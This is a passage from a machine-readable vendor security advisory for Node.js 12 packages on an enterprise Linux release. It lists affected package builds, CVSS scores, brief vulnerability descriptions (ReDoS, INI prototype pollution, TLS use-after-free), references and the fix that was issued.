"AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-docs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0549" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "version": "3.0" }, "products": [ "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-docs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs-npm-user-validate: improper input validation when validating user emails leads to ReDoS" }, { "cve": "CVE-2020-7788", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2020-12-11T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1907444" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-ini. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-ini: Prototype pollution via malicious INI file", "title": "Vulnerability summary" }, { "category": "other", "text": "Node.JS packages in Red Hat Enterprise Linux and Red Hat Software Collections included the vulnerable dependency packaged in \"nodejs-npm\" component. Processing malicious files using npm could potentially trigger this vulnerability. The \"ini\" package bundled with npm was not in the library path where it could be included directly in other programs.\n\nThe nodejs-nodemon packages in Red Hat Enterprise Linux and Red Hat Software Collections are affected by this vulnerability as they bundle the nodejs-ini library. Usage of that library is governed by nodemon itself, so applications started by nodemon are not impacted. Further, nodemon is a developer tool not intended to be used in production.\n\nThe ini package is included in Red Hat Quay by protractor and webpack-cli, both of which are dev dependencies.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-docs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-7788" }, { "category": "external", "summary": "RHBZ#1907444", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1907444" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-7788", "url": "https://www.cve.org/CVERecord?id=CVE-2020-7788" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788" } ], "release_date": "2020-12-08T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-16T14:25:52+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-docs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0549" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-docs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-ini: Prototype pollution via malicious INI file" }, { "cve": "CVE-2020-8265", "cwe": { "id": "CWE-416", "name": "Use After Free" }, "discovery_date": "2021-01-05T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1912854" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs. When writing to a TLS enabled socket, node::StreamBase::Write calls node::TLSWrap::DoWrite with a freshly allocated WriteWrap object as first argument. If the DoWrite method does not return an error, this object is passed back to the caller as part of a StreamWriteResult structure. This may be exploited to corrupt memory leading to a Denial of Service or potentially other exploits.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs: use-after-free in the TLS implementation", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", 